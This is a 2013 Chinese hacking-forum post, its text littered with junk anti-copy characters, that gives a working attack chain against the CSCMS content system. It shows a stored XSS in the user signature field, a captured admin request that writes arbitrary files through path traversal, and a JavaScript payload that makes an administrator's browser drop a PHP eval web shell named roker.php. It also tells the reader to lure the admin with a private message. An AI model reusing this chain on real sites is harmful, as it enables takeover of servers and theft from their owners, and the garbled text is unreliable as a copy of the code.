|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题9 Y/ v1 H( D" g! ~+ T6 G: O
官网已经修补了,所以重新下了源码+ p& R1 |; ?. p" y% e
因为 后台登入 还需要认证码 所以 注入就没看了。% _- A+ `$ @+ ~. {6 s* y4 I/ k
存在 xss
4 J2 K7 {8 R' z漏洞文件 user/member/skin_edit.php
; U; A1 y* _2 I: }0 F+ E" t ?2 `本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:6 R0 m( D. v8 T
* \( g1 [5 \: c</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
5 N3 z6 O/ B& v+ M% S
7 N9 n8 O7 T/ r1 v, l</textarea></td></tr>0 E. p2 j( P6 } r) ]
+ d6 I9 @8 N# ~$ U, w% f( G q# _
user/do.php 9 j5 Y7 @4 f" I& b, C
# e0 z T# U9 i1 t
, O8 W) [% `" F; Y
if($op=='zl'){ //资料( V% x- l( a! t+ Q' P
3 `1 Y; g$ d- _
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) & J; I, q3 \- `6 }! C/ A6 N
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
+ O% e- h! d) f M# T M0 S' } ~ ; w" s# J3 P) k0 }) C" ?" V8 [7 R
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',, m* V/ x: h( D
( s$ z3 K! ^' t1 M! A CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
. v! r9 H* A* Y# F5 g, z+ K9 ? t where CS_Name='".$cscms_name."'";
! d: o( o2 H F. K) e3 U 0 n# u1 G( r" A7 C# `
if($db->query($sql)){
- ?) [- \6 [( J 4 d3 U; t/ N& R# _) Z* C( q
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
, J# \/ |- B+ [& y3 B7 [
: t8 c( r5 T: Y7 N8 K" R' G0 l }else{2 j* v# ~( D5 }# }
2 K" O ^2 a+ ~; Z% ]7 u& q/ E
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
+ e- ^9 J9 }; Y9 `6 j4 C4 u # M V0 n" O+ [' B
}+ s4 W; y# h0 ~# ?
5 f2 N1 y# {/ M; J( p7 }: y$ T
# O5 y- ?7 s: h) L5 p, z
没有 过滤导致xss产生。
% `4 i: d9 J; @- L后台 看了下 很奇葩的是可以写任意格式文件。。7 @' q& F8 {& v6 x) x5 R: r
抓包。。
/ H& I/ N4 V4 i; Y% E
' ~/ b2 N( f+ M1 V& P$ K0 U0 Y1 f
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1( Q9 J0 D) N$ O6 F. l
C' Z0 u! r. L
Accept: text/html, application/xhtml+xml, */*
" V0 _# C0 g' q( j7 a
7 `+ q; d7 K; X# u4 l9 W- WReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
, S1 a. V4 h# A# p/ e# T! N! y / V, n2 p& C3 P; `) W# f6 S
Accept-Language: zh-CN
1 } h& s, S: V/ b( z! b# l : {3 u1 f& M1 h6 S( g4 Z
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
4 H/ F6 o3 a, @7 k 6 q1 v5 b- Q# r6 H3 s
Content-Type: application/x-www-form-urlencoded
! ~3 ^% b; r' Y3 C , Q1 k8 i- G; [3 \8 D" C9 M6 i
Accept-Encoding: gzip, deflate# `, V# A0 `5 U: W3 N0 m" ~
8 V2 @+ V' h5 C' X
Host: 127.0.0.13 h% s- p' {( Q
: Z+ R& T0 @* uContent-Length: 38% v2 h( p9 y! L: l- G7 X
+ U) e) G& P+ _# c# VDNT: 1
' Q4 d6 ]' P" L $ o% P* k! f2 S! B
Connection: Keep-Alive
8 k% b2 c* B6 f3 S9 x
" {( q( i6 d1 `$ S/ iCache-Control: no-cache6 A) L) e: w4 t2 B% `4 u x
1 n4 a/ m4 D" ^% g* M# f+ p3 sCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
' e8 x. f7 {4 i7 Q- B1 S1 N) {
7 u. w0 e1 `; d! W' O' \' Q R
' S$ y" [' Z& r. L, U! E; Vname=aaa.php&content=%3Cs%3E%3Ca%25%3E& N; Z0 H2 p6 D" u* I
* w9 `1 n* w R: J0 w! c1 \; [# \: m- B( L2 r
9 p1 o1 p' q. W' G$ G
于是 构造js如下。
% i& {/ ^; a- t- w8 [2 W1 i! I# w# j
本帖隐藏的内容<script>
" W7 q' q: k I2 y9 xthisTHost = top.location.hostname;
- y- ?. u. {$ ]9 d
, N* f+ I) ]$ ~1 m# n4 P) w6 Z9 O* O+ \thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
$ q/ y1 b6 L9 ~& Y/ s
$ s, c# o* b0 P Ffunction PostSubmit(url, data, msg) {
! H4 M8 y0 O" u' d! t" A$ i var postUrl = url;
- F2 v0 ?) P$ x
" h6 b+ p9 X2 S; R6 Z* d0 S3 X var postData = data; , a5 x. A" r" U4 p
var msgData = msg; $ ^8 U1 c; Y+ r$ m8 m6 X* Q
var ExportForm = document.createElement("FORM");
1 l2 w* @: Y' l document.body.appendChild(ExportForm);
. Y' V% I6 P" N ExportForm.method = "POST"; ! o' x6 R, c1 |' f# A
var newElement = document.createElement("input"); 1 ~5 F: | R- _. P* c% |& \* |, G" Q
newElement.setAttribute("name", "name");
7 b( @4 O9 l T7 g newElement.setAttribute("type", "hidden");
( k7 n) o3 B4 i2 N var newElement2 = document.createElement("input");
5 d1 W; i s5 r: R9 s/ \ newElement2.setAttribute("name", "content");
1 g$ {& i8 I% W/ Y newElement2.setAttribute("type", "hidden");
- R& d( U0 Y$ O ExportForm.appendChild(newElement); |5 |/ |2 [3 a3 `7 a& f3 Y
ExportForm.appendChild(newElement2);
" ^3 g: z; w: T newElement.value = postData; 6 R6 \( R4 n# e7 e( ?
newElement2.value = msgData;
8 |2 }+ w& p6 m8 N R0 G; g ExportForm.action = postUrl;
2 r/ Q' v# Z, S& y5 C ExportForm.submit();
8 p" K7 n) s: |% g; N7 _};
& x( W, S# y; B2 S9 _3 f7 u* R
2 ^$ z' U) x# HPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");8 g- U+ t4 n! \6 L+ o7 @
) ?2 E8 |. { I; [
</script>" Z- M& K2 M- M2 h |8 W2 u
& T" r' f1 F/ m; R
7 ^* L2 N5 b/ U
1 y0 M5 ^- \1 J4 R& x* U8 ihttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入8 J$ j3 n% g) j! X/ ~2 U
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)+ E# a' {. H' Z' A/ f7 Y
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
8 s0 b) ^" o7 S& Y$ |
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对